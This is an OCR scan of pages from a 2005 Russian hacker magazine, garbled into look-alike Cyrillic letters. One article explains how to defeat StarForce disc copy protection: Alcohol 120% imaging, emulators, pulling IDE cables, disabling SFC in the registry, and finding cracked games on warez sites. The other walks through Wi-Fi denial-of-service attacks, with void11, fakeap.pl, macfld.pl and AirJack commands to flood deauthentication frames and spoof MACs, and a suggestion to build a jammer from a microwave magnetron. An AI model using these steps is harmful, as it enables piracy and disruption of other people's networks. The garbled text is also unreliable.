оценить стабильность всех временных характеристик. Чем качественнее 
привод, тем жестче проверка, и наоборот. На разболтанных приводах, за- 
щита вынуждена «снижать планку», иначе даже лицензионный диск опоз- 
нается как поддельный, а вот этого уже допускать нельзя. Отсюда вывод — 
копируем диск на хреновую болванку и пускаем ее на раздолбанном при- 




Нередко после установки 
обновления от МісгозоП 
лицензионные игры вне- 
запно отказываются рабо- 
тать, требуя установки об- 
новления от ЗІагРогсе. Ска- 
чать его можно здесь: 
шшш. ЗІагРогсе. ти/зир- 
рогі/зШѵир.гір. 

Последние версии «Звез- 
дной Силы» очень глубоко 
вклиниваются в ѴѴІпбот и 
даже модифицируют ее 
ядро, в результате чего си- 
стема часто начинает рабо- 
тать крайне нестабильно, о 
чем свидетельствует и мой 
личный опыт, и ряд сооб- 
щений на форумах. 



[хакер 08 [80] 05 > ВЗЛОМ 063 ] 



[хакер 08 [80] 05 > ВЗЛОМ 064 ] 



воде (на некоторых приводах можно даже специально расстроить автома- 
тический регулятор скоростей, за это отвечает специальный резистор). У 
нас есть шанс, что скопированный диск опознается как оригинальный. 
Если же ничего не получится, необходимо повторить фокус на другой 
партии болванок от другого производителя. Достаточно многие пользо- 
ватели сообщают, что им удавалось скопировать защищенные диски на 
СО-РѴѴ. За счет невысокой отражательной способности, перезаписыва- 
емые носители читаются гораздо хуже и, естественно, не так стабильно. 
Также полезно использовать приводы, которые не позволяют себя «тор- 
мозить» (утилиты вроде СОЗІоѵѵ о ними не работают). Если при профи- 
лировке диска, разброс замеров превышает некоторую величину, 8Р 
пытается перевести привод на более низкую скорость. 

По моему опыту, для гарантирован- 
ного копирования диска на СО-В, 
нужно затратить не менее 10 болва- 
нок от различных производителей о 
различной геометрий спиральной 
дорожки, для измерения которой 
можно использовать мою утилиту, 
прилагаемую к статье. Конечно, 10 
болванок это много, но лицензион- 
ная копия обойдется значительно 
дороже. Более простых путей, к со- 
жалению, не существует и прежде, 
чем двигаться дальше, стоит поис- 
кать копируемую игру в файлообменных сетях, вроде еОопкеу, посидеть на 
ІНС или пробежаться по варезным серверам. Не может быть, чтобы ее ни- 
кто не взломал! Нормальный хакер отвязывает игру от СО самое большее 
за день (при условии, что он уже знаком со БіагРогсе), однако о каждой про- 
граммой приходится воевать индивидуально. 

На сайте ѵѵѵѵт.датесорумогісі.сот содержится множество хакнутых игр 
вместе с инструкцией по их копированию, но там лежат в основном запад- 
ные игры, да и к тому же далеко не всякий взлом — правильный. Когда ис- 
чезает музыка, звуки или постоянно вылетает сообщение о критической 
ошибке, — это уже не игра, а сплошное непотребство получается. 




ВизНоипб за работой 



[помощь алкоголя] Тогда берем Алкоголя (или официально, АІсоІто! 
120%), говорим «создать образ», в типе данных указываем БіагРогсе 
1.Х/2.Х/З.Х или Зесигот *МЕ\Л/ (Ѵ4.х). При этом ав- 
томатически взводится галочка «измерение по- 
зиционирования данных (Точность: высокая)», 
галочка «чтение субканальных данных» должна 
быть сброшена, положение всех остальных — не- 
критично (на некачественных дисках «быстрый 
пропуск» ошибок иногда приводит к проблемам). 

Скорость измерения позиционирования обычно 
рекомендуется ставить на минимум и в течение 
всей операции даже не дышать на компьютер. Ріа 
самом деле, хорошему коту и в декабре март. 

Мой ТЕАС-52Х от левого производителя нор- 
мально измеряет геометрию спиральной дорож- 
ки (также называемую топологией) даже на 52-х, 
а вот при снижении скорости начинает «бре- 
хать». Так что, здесь, возможно, придется и поэкспериментировать. 
Снятый образ не может быть непосредственно записан на болванку и пред- 
назначен специально для эмулятора. Одни предпочитают использовать 
эмулятор, вмонтированный в Алкоголь, другие выбирают Оаетоп Тооіз. В 
Алкоголе для этого достаточно зайти в настойки -> виртуальный диск, ука- 
зать любое разумное количество виртуальный дисков, отличное от нуля, и 
при желании взвести галочку «перемонтировать образы при перезагрузке 
системы», чтобы они монтировались автоматом. 

Древние версии ЗІагРогсе доверчиво работали о виртуальным образом, 
принимая его за подлинный, но затем все изменилось. Если в системе 
есть ХОТЯ бы один ЮЕ-привод, защита посылает все остальные приво- 
ды в Оклахому и требует вставить лицензионный диск именно в ЮЕ. 
Да! Даже если остальные диски вполне законные ЗСЗІ-накопители. На- 
стоящие мужчины (у которых материнская плата привинчена к стене) 
просто выдирают ЮЕ-шлейф из СО-НОМ (или лишают его питания), по- 
сле чего виртуальный образ работает как ни в чем ни бывало. Как ва- 
риант, можно приобрести ЗСІЗ, НЗВ или ЕРТ СО-РОМ и не париться. 
Также можно воспользоваться программами зіаг-іиск и ЗІагРогсе 
підбігпаге, выключающих ЮЕ-каналы «на лету», однако новые версии 
ЗІагРогсе уже научились бороться с ними. 

Что делать, если снятый образ не работает? Первым делом, необходимо 
удостовериться, что образ снят правильно. Берем программу Абѵап- 
себМОЗЕсііІог.ехе, открываем файл образа и смотрим — если форма 
кривой, характеризующей скорость чтения спиральной дорожки, имеет 




при меньшем значе- 
нии угла сектор У ус- 
певает уплыть, 
и головка вынуждена 
ждать целый виток 




Ріехіог Ргетиіт — один из немногих приводов, поддерживающих запись 
с заданной плотностью 




настойка Алкоголя 



«выбросы» или дрожит, как замерзший цуцик, то снятый образ никуда не 
годится, необходимо выбрать другую скорость и повторить операцию 
еще раз, или просто «огладить» кривую, нажав кнопку «Еіпеаг Іпіегроіа- 
1ІОП» (линейная интерполяция) или, что еще лучше, — Зрііпе Ѳгаріі 

(сплайн-интерполяция), добившись 
максимальной «гладкости» кри- 
вой. Для некоторых игр готовый 
образ можно найти в Сети (одна из 
таких коллекций находится на сай- 
те Мф://ссІги.підМтаіІ.ги). 

Но это еще не все! Новые версии 
ЗІагРогсе блокируют работу фай- 
ловой системы на время проверки 
ключевого диска и следят, чтобы о 
жесткого диска не читались защи- 
щаемые данные. Что тут можно 
предпринять? Поскольку блокировка файловой системы осуществляет- 
ся посредством ЗРС (возможно, не во всех версиях ЗІагРогсе), то, от- 
ключив ЗРС, мы вырвемся на свободу. Запускам редактор реестра, ви- 
дим ветку НКЕѴ_ЕОСАЕ_МАСНІМЕ\ЗОРТѴѴАР!Е\ІѴІІсгозотѴѴІпсіо\д/з 
МТ\Сиггеп1Ѵегзіоп\ѴѴІпІодоп, меняем значение параметра «ЗІсОізаЫе» 
на «б\л/огс1:НЯ119с1» и перезагружаемся. Чтобы включить его обратно, до- 
статочно записать сюда 0. 

Однако отключать ЗРС на продолжительное время нежелательно — доста- 
нут вирусы и черви. К тому же, это работает не со всеми версиями ЗІагРогсе. 
Обладатели ОѴО-приводов на 3031-шине могут запускать образ оттуда. За- 
щита не распознает подмены и эмулятор работает 
на ура. Ріа СО-Р1/РІѴѴ залить полный образ нельзя, 
поскольку информация о структуре спиральной 
дорожки, содержащаяся в файле гпбз отнимает 
-27 Мб свободного места и на обычный диск вле- 
зает только с пережигом, да и то не всегда. 



[хакеры-обрезки] Хакеры ответили на это бе- 
зобразие методом «обрезков». Все очень просто. 
Проверяя структуру спиральной дорожки, защита 
не проверяет (точнее не проверяла) ее содержи- 
мое. Пускаем Алкоголя, дожидаемся, когда «из- 
мерение ОРМ» подойдет к концу и начнется 
сброс дампа, даем ему поработать несколько се- 
кунд (чтобы успел считаться коневой каталог и 
некоторые другие служебные структуры, без ко- 
торых ѴѴІпбоѵѵз не сможет опознать диск), а за- 
тем нажимаем «отмену». Алкоголь опросит, хо- 
тим ли мы удалить файлы. Конечно, 
нет! Пускаем Нерона и записываем 
оставшиеся от Алкоголя тсіі и гпсіз 
файлы на болванку как обычные 
файлы, вставляем записанный диск 
в ЗСЗІ или иЗВ СО-РЮМ, подключа- 
ем эмулятор и наслаждаемся игрой, 
причем саму игру в этом случае при- 
дется запускать о винчестера. 

К сожалению, в новых версиях этот 
трюк уже не работает. Теперь защи- 
та помимо структуры спиральной 
дорожки проверяет и ее содержи- 
мое. Так что ждем новых версий 




когда угол между 
секторами X и У со- 
ставляет ~15 граду- 
сов, при переходе на 
соседний виток, сек- 
тор У сразу же «под- 
летает» к оптической 
головке 




логотип ЗІагРогсе, по которому 
эту защиту легко отличить от 
любой другой 



















Рогсе Рго^еззіопаІ (самая дорогая и самая глюкавая). Многие фирмы пред- 
почитают Вазіс ЕсІІІІоп (надежнее и дешевле). Ріа сайте разработчиков при- 
водится сводная таблица, сравнивающая защиты друг с другом {ѵѵтѵѵ.ЗІаг- 
Рогсе.ги/ргоіесІіоп/ргоІесІіоп.рМтІ?с=113), которую полезно изучить перед 
тем, как кричать на весь мир «я ЗІагРогсе сломал!». Вазіс ЕсІИІоп, действи- 
тельно, ломается очень просто, а вот над РгоІеззіопаГом приходится проде- 
лывать все вышеописанные «танцы». 

[натанцевались] После экспериментов со ВІагРогсе хотелось бы начи- 
сто удалить ее из системы, чтобы там ничего не торчало и ни с чем не кон- 
фликтовало. Теоретически, это должен сделать разработчик деинсталля- 
тора игрушки, практически же «зачисткой» операционной территории при- 
ходится заниматься самостоятельно. Предвидя праведный гнев пользова- 
телей, разработчики ЗР выпустили специальную утилиту, которая все дела- 
ет сама, и отдали ее на всеобщее растерзание. Качайте: тѵіѵ.ЗІагЗог- 
се.ги/зиррогі/зісІгѵгет.гір. 

[заключение] Так все-таки, взломан ЗІагРогсе, или нет? Создать пират- 
скую копию защищенного диска вполне реально, но при этом придется во- 



ИСХОДНЫЙ график дрожит как замерзший зяблик и скопированный диск, 
естественно, не опознается 



эмуляторов (разработчики Оаетоп Тооіз обещают вот-вот выпустить че- 
твертую версию, главной «вкусностью» которой станет обход ЗІагРогсе без 
всех этих шаманских танцев с образами и приводами). Пока же приходит- 
ся использовать хакнутые драйвера для ЗІагРогсе, из которых вырезана 
блокировка файловой системы, благодаря чему полноценный образ (не об- 
резок!) можно пускать с винта. Рде их взять? Хороший вопрос. Они по- 
стоянно меняют свои адреса, и дать постоянную ссылку довольно затруд- 
нительно. Поисковики также не помогают, поскольку к тому моменту, ког- 
да они проиндексируют хакерскую страничку, она уже успевает умереть. А 
вот форумы — это самое то! Если нет хакнутых драйверов, можно запу- 
стить снятый образ по Сети. Эмулятор его увидит, а вот защита — нет. Ра- 
зумеется, локальная сеть есть далеко не у всех, а приобретать второй ком- 
пьютер решится не каждый. 




Впрочем, дела обстоят не так уж и мрачно. В ходу до сих пор остается мно- 
жество старых версий защиты, и Алкоголь рулит. Кстати говоря, при уста- 
новке обновлений на игру, вместе с самой гамесой зачастую обновляется 
и защита, поэтому прибегать к обновлениям следует лишь тогда, когда они 
действительно необходимы. К тому же с эмуляторами борется только 34аг- 




сглаженный график после обработки — скопированный диск запуска- 
ется нормально 



зиться с эмуляторами, дергать шлейфы, переходить на ЗСЗ!-накопители и 
совершать кучу других противоестественных для рядового геймера вещей. 
«Отвязать» ЗІагРогсе от диска вручную вполне реально и все популярные 
игры уже давно отвязаны, так что говорить о безальтернативном переходе 
на лицензионную продукцию слишком рано. Лучше подождать несколько 
дней (или недель), пока хакнутая программа не появится в Сети. 
Легендарная «неломаемость» ЗР относится именно к автоматическому копи- 
рованию дисков специальным копировщиком. Появление таких копировщиков 
ожидается в ближайшем будущем. Разработчики Оаетоп Тооіз и Алкоголя не 

дремлют, но ведь и разработчики ЗР 
тоже! Короче, перед нами разворачи- 
вается целое представление в стиле 
«противостояние щита и меча». Каж- 
дый из нас сам выбирает «свою» сто- 
рону баррикады. Ріо если присоеди- 
ниться к хакерскому племени может 
каждый, то принять участие в разра- 
ботке защиты — едва ли. Ведь это 
закрытый клуб со своими законами и 
бизнес-машиной внутри ® 
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официальный сайт защиты 



I ЗТАПРОРСЕ КАК 
ТРОЯНСКАЯ ЛОШАДЬ I 

Одно из лучших определений трояна 
гласит: троян — программа, выполняю- 
щая в тайне от пользователя действия, 
о которых юзер не осведомлен и в кото- 
рых не нуждается. То, что ЗІагРогсе па- 
костит в системе, — всем известно. 
Практически любая программа делает 
тоже самое (так говорят разработчики 



ЗР), но никому бы и на ум не пришло 
оставлять в системе дыру таких разме- 
ров. Для укрепления противохакерской 
обороны, часть защитного кода выпол- 
няется на нулевом кольце, что достига- 
ется открытием устройства \\.\РРіО- 
□ВѴ06, заботливо установленного 
драйвером ЗІагРогсе. Для этого даже не 
нужно администраторских прав. Любой 
посторонний код может проникнуть 



в РІІМОО, не спрашивая нашего разре- 
шения! Чуть позже это дыру вроде бы 
залатали (правда, я не смотрел нас- 
колько надежно), однако уже сам факт 
настораживает. Нашли одну дыру — 
найдут и другие. НАРЗ, ехігете ргоіес- 
(ог и другие враги народа также исполь- 
зуют переход на нулевое кольцо, но при 
этом ухитряются обходится без дыр и 
голубых экранов. 



[хакер 08 [80] 05 > ВЗЛОМ 065 ] 








ЮНИТЫ КРЕАТИФФ КОДИНГ УМІХОЮ СЦЕНА [ВЗЛОМ] ИМПЛАНТ РС_20МЕ РЕРВУМ НЬЮСЫ 




Воздушный отказ 



СЛАБАЯ ЗАЩИЩЕННОСТЬ ПРОТОКОЛОВ СТАНДАРТА 
802.11 ВКУПЕ С НИЗКИМ УРОВНЕМ ПОДГОТОВКИ СИ- 
СТЕМНЫХ АДМИНИСТРАТОРОВ МНОГИХ СЕТЕЙ, ИС- 
ПОЛЬЗУЮЩИХ ЭТОТ СТАНДАРТ, ДЕЛАЮТ ПРОНИКНО- 
ВЕНИЕ В БЕСПРОВОДНУЮ СЕТЬ ЗАДАЧЕЙ ТРИВИАЛЬ- 
НОЙ ДЛЯ ЛЮБОГО БОЛЕЕ-МЕНЕЕ КВАЛИФИЦИРОВАН- 
НОГО ВЗЛОМЩИКА I ВоззотаЬааг [гоззотаМааг@таіІ.ги] 








Описание Оо8 атак на ѴѴіРі-сети 

Мы уже писали о классических приемах взлома ѴѴІРІ-сетей: описывали 
уязвимости ѴѴЕР, процесс взлома сетевых ключей и использование со- 
циальной инженерии. Но реальность такова, что помимо этих приемов, 
протоколы семейства 802.11 уязвимы и к ОоЗ-атакам, которые позво- 
ляют заглушить любую точку доступа, нарушить функционирование се- 
ти и перехватить данные. Об этой угрозе мы и поговорим сегодня. 

[зачем это?] Зачем проводить ОоЗ-атаку на ѴѴІРІ? Чтобы вывести сеть из 
строя? Да, но не только для этого, ведь Оо8-атака является важной составной 
частью атак тап-іп-тісісііе. Вообще, рассмотрение атак этого типа, тема от- 
дельной статьи, но если кратко, то суть данной атаки заключается в замене 
работающей в сети точки доступа своей собственной. Чтобы отключить за- 
конную АР необходимо ее задосить, вывести из строя. Соорудить фальщивую 
точку доступа не так уж сложно, главное проблема здесь — в совпадении па- 
раметров внедряемой точки доступа (таких, как Е38Ю, ѴѴЕР, МАС) с параме- 
трами точки-жертвы. Более простая реализация этой атаки состоит в подме- 
не какого-то клиентского хоста своим поддельным, что гораздо проще осуще- 
ствить, так как не нужно конфигурировать внедряемый хост как АР, а нужно 
только имитировать ІР и МАС подменяемого узла. 

[классификация ѴѴіРі-Оо5] Довольно логично все 0о8-атаки на ѴѴІРІ 
разделить на две группы: 

* Атаки на так называемый 1-й, физический уровень сети 

* Атаки на 2-й уровень, программный 





Атаки первого типа представляются 
двумя разновидностями. Первая 
предполагает бомбардировку рабо- 
чей частоты уничтожаемого хоста 
различным щумовым трафиком, 
представляющим из себя «инфор- 
мационный мусор». По сути, это 
обыкновенный флуд корректным 
трафиком, приводящий к СепіаІ о? 

Зегѵісе. Вторая разновидность за- 
ключается в ислользовании спе- 
циальных щумогенераторов, кото- 
рые напрочь забивают рабочий ди- 
апазон помехами и препятствуют 
нормальной работе. 

Атаки на программный уровень 
предполагают использование уяз- 
вимостей в различных протоколах, 
службах, системах аутентифика- 
ции и т.п. В этой статье будут рас- 
сматриваться, помимо атак на пер- 
вый уровень, атаки, нацеленные на 

протоколы беспроводных сетей 802.11. Отсюда можно предложить еще 
одну классификацию атак на протоколы ѴѴІРІ — в зависимости от стан- 
дарта беспроводной сети. Сегодня используются следующие стандарты 
сетей 802.11: 802.11а, 802.1 1Ь, 802.1 1д, 802.1 1І. Большинство выпущен- 
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ЫеАР: ттЫаскаЫе- 
туіо/ргоіесі/іакеар 
АІФск: ШрМ02. 1 1піп- 
іа.пеі/аігіаск 

НозЫР: ШрМозІар.еріІезІ.а 

Следует понимать, что все 
описанные в этой статье 
действия носят исключи- 
тельно исследовательский 
характер и направлены на 
предотвращение возмож- 
ных проблем с функциони- 
рованием беспроводных се- 
тей. Соблюдай законы стра- 
ны, в которой ты живешь. 

На нашем диске ты найдешь 
все описанные в статьи 
драйвера, программы, сцена- 
рии и массу документации. 




со 



ного в недавнее время оборудова- 
ния для беспроводных сетей ориен- 
тировано на работу в первых двух. 

Поэтому зачастую администраторы 
уже сложившихся беспроводных 
сетей не имеют возможности, по 
чисто экономическим причинам, 
перейти на более безопасный про- 
токол 802.1 1д. Рассмотрим подроб- 
нее атаки на первый уровень бес- 
проводных сетей. 

[глушение] Как ты знаешь, сети ѴѴІРІ используют диапазон частот 2,4 — ^2,5 Г гц. 
Рассмотрим стандарт 802.1 1 Ь, наиболее распространенный на сегодняшний 
день. Ширина канала в данном стандарте составляет 22 МГ ц, минимальный 
промежуток частот между каналами — 5 МГц. Таким образом, возможна пе- 
редача на четырнадцати каналах, многие из которых сильно перекрывают- 
ся, вследствие чего в одной зоне покрытие одновременно нормально могут 
функционировать три точки доступа, у которых частоты не перекрываются 
или перекрываются очень слабо. Посмотри на соответствующий рисунок и 
тебе сразу станет ясен смысл написанного выше :). 

Предположим, мы хотим отрубить точку доступа от сети, чтобы провести 
атаку «человек посередине». Для этого мы начинаем наполнять «мус- 
ором» канал, на котором работает эта точка доступа. Допустим, она рабо- 
тает на шестом канале (во многих точках этот канал установлен «по умол- 
чанию»), Если начать передавать по данному каналу огромное количество 
ничего не представляющих из себя фреймов 802.11 со значительной мощ- 
ностью сигнала (ЕІНР), то у хостов, взаимодействующих с этой точкой по- 
высится ВЕР (Вазіс Еггог Наііо — базовый коэффициент ошибки). Боль- 
шая часть оборудования для беспроводной связи в таком случае начина- 
ет искать возможность соединения на соседних каналах, и если они обна- 
ружат там точку с теми же параметрами ЕЗЗЮ, ѴѴЕР (а они ее обнаружат — 
мы сделаем для этого все возможное:) и более низким ВЕР, то они уста- 
новят соединение с этой точкой, «забив» на законную АР. Это действует, 
однако о некоторыми оговорками. Во-первых, некоторые девайсы можно 
настроить таким образом, что они будут работать на одном и том же кана- 
ле, вне зависимости от уровня ВЕР, чем часто пользуются админы сетей 
ѴѴІРІ. Но это характерно в основном для стационарного оборудования, — 
мобильные хосты практически всегда ориентируются на взаимодействие с 
точкой доступа по стабильному каналу. 

Как видишь, для проведения атаки «человек посередине» не обязательно 



даже окончательно отрубать точку доступа от сети, достаточно лишь замус- 
орить ее рабочий канал и развернуть поддельную точку, стоящую не менее, 
чем на пять каналов от подавляемой АР. При этом хорошо бы использовать 
антенну с высоким коэффициентом усиления для внедряемой точки. 

Если проводить аналогию о ОоЗ- 
атаками в проводных сетях, то та- 
кие атаки по своей сути больше на- 
поминают ОізІгіЬиІесІ ОоЗ, где ис- 
пользуется большое число ком- 
пьютеров, генерирующих огромное 
количество трафика в сторону 
жертвы, заваливая ее различными 
запросами и т.п. В нашем же слу- 
чае, вместо большого числа ата- 
кующих компьютеров использует- 
ся один, но использующий боль- 
шую мощность передачи сигнала. 
Еще один способ «завалить» сеть 



I СПЕЦИФИЧНЫЕ АТАКИ I 

Можно привести ряд концепций атак на сети, использующие 
определенные специфичные настройки. К примеру, в сети мо- 
жет быть включен режим экономии энергии. В таком режиме 
хосты могут находиться в спящем режиме, а точка доступа бу- 
дет накапливать предназначенные им фреймы. Взломщик мо- 
жет притвориться сонным хостом, а затем выйти из спящего 
режима, после чего он получит все фреймы, предназначенные 
«уснувшему» хосту. Еще один способ, с помощью которого 
можно воспользоваться в корыстных целях спящим режимом 
хоста, заключается в подделке специальных служебных фрей- 
мов с ТІМ (ТгаНіс Іпсіісаііоп Мар), посылаемых точкой доступа. 
АР посылают «спящим» хостам ТІМ-фреймы с сообщением о 
поступлении новых данных для данного хоста, чтобы тот 
«проснулся» и забрал накопившуюся информацию. Если ка- 
ким-то образом перекрыть настоящим ТІМ-фреймам доступ к 
хосту, то точка доступа будет вынуждена уничтожать накопив- 
шиеся и не полученные хостом фреймы, так как имеет ограни- 
ченный размер буфера для их хранения. 





ѵойі 1 о графическим интерфейсом 



[хакер 08 [80] 05 > 





[хакер 08 [80] 05 > ВЗЛОМ 068 ] 



стандарта 802.11 заключается в использовании специально сконструи- 
рованной «глушилки», представляющей собой устройство, генерирую- 
щее шумы в определенном диапазоне частот. Очень мощный шумогене- 
ратор можно изготовить из магнетрона — девайса, использующемся в 
микроволновых печах. Интересно, что магнетрон работает на частоте 
2,445 ГГц плюс-минус определенное мегагерц, обычно весьма значи- 
тельное. Угадай, какой канал он перекрывает в первую очередь? Конеч- 
но, самый используемый — шестой. 

Беспроводные сети беззащитны перед атаками на первый уровень. 
Единственное, что можно предпринять — попробовать обнаружить 
источник помех. Это можно сделать методом триангуляции, путем за- 
мера уровня сигнала шумогенератора в нескольких точках. На осно- 
вании полученных данных можно попытаться определить местона- 
хождение глушащего устройства. 

[Ьиііег оѵегііоѵѵ] Итак, переполнение буфера. Дело в том, что многие 
точки доступа, в том числе программные, отводят ограниченную область 
памяти под обработку запросов на присоединение и аутентификацию. 
Переполнение буфера можно осуществить с помощью проги Ѵоісііі. Эта 
прога предназначена для работы в Еіпих (нужны дрова НозІАР и карта о 
набором микросхем Ргізт). Данная тулза идеально подходит для прове- 
дения Оо8-атак на беспроводные сети. Она умеет генерировать фреймы 
трех типов: запрос на аутентификацию, присоединение и прекращение 
сеанса. Она также умеет проводить атаки на несколько хостов, устана- 
вливать количество одновременно работающих потоков, задержку меж- 
ду отправкой фреймов и многое другое. В общем, отличная штука. 

Еще одна возможность переполнения буфера точки состоит в том. 



Рлымнімяі іііилдв ці слтіі 1 1 1з 




При помощи магнетрона из микроволновки можно соорудить 
настоящего убийцу для ѴѴІП-точек 



чтобы присоединиться к ней, и по- 
сле этого начать быстро менять 
свой МАО. Как менять МАС-ад- 
рес? Элементарно! 

$ і^соп!ід ѵѵІапО Ііѵѵ еШег 
РР:РР:РР:РР:РР:РР 

Это с помощью іісопіід, аналогич- 
ная операция с помощью іргоиіе 
выполняется следующим образом: 



$ ір Ііпк $еІ сіеѵ ѵѵІапО асШге$з РР:РР:РР:РР:РР:РР 

Реализовать быструю смену МАО можно, написав небольшой сцена- 
рий, например, на перле, что и было сделано Джошуа Райтом в его 
творении гпаоіісі.рі (скачать можно на сайте автора — Ыір://Ію- 
те .]ѵѵи .есіи/іѵѵгідііі/регі ./ііт). Чтобы выполнить сценарий, вводим: 
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Частотное распределение по каналам 802.11 
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-и предназначен для 
установки задержки в 
микросекундах, перед 
генерацией следующе- 
го МАС-адреса. 



• I 



Работа с утилитой іѵѵоопіід 




В хелпе можно в подробностях оз- 
накомиться с возможностями ѵойі 1 



[фреймы-фальшив- 
ки] Наиболее распро- 
страненный вид Оо8- 
атак — это посылка большого ко- 
личества фреймов с запросами на 
прекращение сеанса и отсоедине- 
ние. Сущность этой атаки состоит 
в отправке выбранному хосту или 
хостам запросов на прекращение 
сеанса и отсоединение от имени 
точки доступа, от ее МАС-адреса. 
Отсоединив хост, можно присое- 
диниться к сети, установив его 



МАС-адрес. Так обычно хакеры обходят фильтрацию мак-адресов. 
Чтобы надолго вырубить хост, лучше всего применить ѴоісП 1 . Давай 
посмотрим ее в работе. Но сначала нужно установить дрова НозІАР. 
Найти их последнюю версию можно на Мір://Іювіар.ерИевІ.ІІ. Чтобы 
Ѵоісіі 1 работала на них, необходимо определить константу РР18М2_Н08- 
ТАРО в бгіѵег/тосІиІев/Ііовіар_сопІідМ (это необходимо проделывать 
в ранних версиях драйверов, в новых — не нужно). Компилим под рутом: 

$ таке && таке_рссагс1 

Это вариант для карт РСМСІА. Теперь нужно перезапустить службы РСМ- 
СІА и поместить карту в разъем. Если все прошло успешно, то карта начи- 
нает работать в режиме точки доступа. Можно произвести настройку карты 
о помощью Еіпих ѴѴІгеІезз Ехіепзіопз: 

$ іѵѵсопіід 

Ты увидишь, параметры работы карты (они берутся из /ргос/пеі/беѵ). Здесь 
параметр МосІе:Маз1ег означает, что карта работает в режиме точки досту- 
па. Сменить режим и любой параметр можно командой: 

$ іѵѵсопіід ѵѵІапО тосіе гереаіег с(іаппеІ 6 

Так мы заставили карту работать в качестве репитера на шестом канале. 
Как я уже говорил, сконфигурировать точку доступа совсем несложно. 
Ѵоісііі состоит из двух утилит: ѵоіб11_Іторрег и ѵоісіі 1_репе1га1іоп. Хоппер 
конфигурирует карту, а пенетрейшн нужен для генерации фреймов. Отру- 
бим, например, хост с МАС-адресом РР:РР:РР:РР:РР:РР, посылая фреймы с 
адреса АА:АА:АА:АА:АА:АА: 

ѵоісІ11_Иоррег>/(іеѵ/пиІІ & 

ѵоісІ11_репеІгаІіоп -з АА:АА:АА:АА:АА:АА -В РР:РР:РР:РР:РР:РР -0 ѵѵІапО 

А вот пример атаки на переполнение буфера по списку адресов, содержа- 
щихся в файле зрізок: 



$рег1 тасРІсІ.рІ -с 1000 -и 10000 

Флаг -с указывает на то, сколько нужно генерировать МАС-адресов, флаг 



ѴОІСІІ 1_Иоррег >/Реѵ/пиІІ & 

ѴОІСІІ 1_репе1га1іоп -1 2 -I зрізок -0 ѵѵіапО 











я не стану подробно останавливаться расказы- 
вать на назначении различных флагов этой ути- 
лы, будет лучше, если ты разберешься в них сам 
(-И — самый важный флаг :). 

Идем дальше. Данную атаку можно усилить пу- 
тем посылки вместе с фреймами, содержащими 
запросы на отсоединение или прекращение се- 
анса, еще и поддельных ответов на пробные за- 
просы атакуемого хоста, перенаправляющих 
этот хост на точку с несуществующими Е83Ю и 
на неиспользуемый канал. Для проведения этой 
атаки в дополнение к ѴоісИІ можно использо- 
вать перловый скрипт Іакеар.рІ от ВІаск АІскіегпу 
ЕпГегргізез, умеющую посылать поддельные 
фреймы-маяки. Как и воид11, фейкэп работает 
на драйверах НозІАР. Перед использованием 
этот скрипт придется немного править. Во-пер- 
вых, переменную $МАХ_СНАММЕЕ, которая рав- 
на 11 исправь на 14 (американское законода- 
тельство сужает диапазон частот под ѴѴІРІ, поэ- 
тому максимальное число каналов там — 1 1 , у 
нас — 14). Возможно, придется изменить пути к 
файлам в переменных $ІѴѴСОМРЮ, $1РСОМРЮ, 
$СРІѴРТСОМР. Запускаем: 

$ регі Іакеар.рІ 

Как видишь, нам потребуется указать в параме- 
тре -сітаппеі какой-нибудь неиспользуемый, ука- 
зать параметром -ѵѵогсіз файл с заранее подгото- 
вленным списком поддельных ЕЗЗЮ. 
Существует еще одна разновидность ОоЗ-атак, 
использующая поддельные фреймы. Она реа- 
лизована Марком Осборном (Магк ОзЬогпе) в 
проге Іаіащаок. Эта программка посылает за- 
прос на аутентификацию к точке доступа от 
имени хоста-жертвы. Запрос сформирован та- 
ким образом, что точка возвращает атакуемо- 
му хосту фрейм с сообщением об ошибке и раз- 
рывает о ним соединение, причем повторное 
присоединение этого хоста к точке становится 
весьма затруднительным. 

[воздушный Джек] Работает (аіащаск на 
драйверах, идущих в комплекте программ Аіг- 
4аск. Должен сказать, что этот комплект, пожа- 
луй, наилучший инструмент для генерирования 
различных фреймов 802.11. Изначально он 
создавался для карт с набором микросхем Ргіз- 
гпІІ, но уже сейчас его можно настроить и под 
карты с набором схем Негтез, а в планах раз- 
работчиков осуществить в будущем поддержку 
и других наборов схем. АігОаск включает в себя 
ряд утилит: топкеуДаск, предназначенную для 
проведения атак «человек посередине»; ее мо- 
дификацию огаокегДаск; еззібДаск, служащую 
для обнаружения скрытого ЕЗЗЮ; ѵѵІапДаск — 
для посылки фреймов прекращения сеанса с 
поддельным МАО. Распространяется Аіг4аск по 
лицензии они, взять исходники можешь на 
Шр://802. 1 1піпіа.пеі/аігіаск. 

Под драйвера Аі^^аок написана такая замеча- 
тельная прога, как РІІе2Аіг. Название ее гово- 
рит само за себя — она передает файлы по 
воздуху. При этом она не генерирует фреймы 
802.11, а просто передает двоичный файл «в 
эфир». Эта тулза для настоящих хакеров. Ты 
можешь сам составлять абсолютно любые 
фреймы в шестнадцатеричном редакторе и по- 
сылать их по указанному каналу, указав за- 
держку, количество отправок и иные параме- 
тры. Конечно, необходимо знание различных 
протоколов стандарта 802.11, но представь, 
как удобно с помощью этого инструмента ис- 
кать новые уязвимости сетей и реализовывать 
атаки, для которых еще не создано специали- 
зированного инструмента. В комплекте с пер- 



вой версией этой программы шло всего три 
примера двоичных файлов, применение кото- 
рых описывалось в НЕАОМЕ. Сейчас уже мож- 
но найти файлы с фреймами, предназначенны- 
ми, например, для проведения всех вышеопи- 
санных ОоЗ-атак. Таким образом, эта прога — 
самый универсальный инструмент ѴѴІРІ-хакера, 
который годится как для атак на беспроводные 
сети, так и для их защиты от вторжений. Она 
умеет посылать фреймы даже в режиме мони- 
торинга, а это позволяет реагировать на раз- 
личные события в сети, путем написания не- 
сложных скриптов. 

Собирается Аіг4аск стандартной командой та- 
ке. При этом, возможно, появится сообщение 
об ошибке, связанной о символом 'стрхоітіід'. 
Исправить ее можно, удалив флаг -ѴѴеггоѵѵ из 
переменной СРЕАОЗ, находящейся в файле 
МакеІІІе. Далее надо скопировать аіг]аок_сз.о 
в каталог /ІІЬ/тосіиІез/версия_ядра/рстоіа и 
запустить сіертосі. Затем в еіо/ротсіа нужно 
править файлы ѵѵіап-пд.сопі и сопіід путем за- 
мены всех строк ЬіпсІ ргізт2_сз на а1г)аок_оз. 
Теперь остается вытащить карту из разъема и 
перезапустить менеджер карт. Вставляем ее 
снова и даем команду Ізтосі. Если все прошло 
успешно, то в качестве модуля будет стоять 
аігіаск-сз. Теперь нужно поднять интерфейс 
беспроводной карты. 

$ іісоп^ід -а 

Смотрим, появился ли интерфейс а]0, и, если по- 
явился, то поднимаем его: 

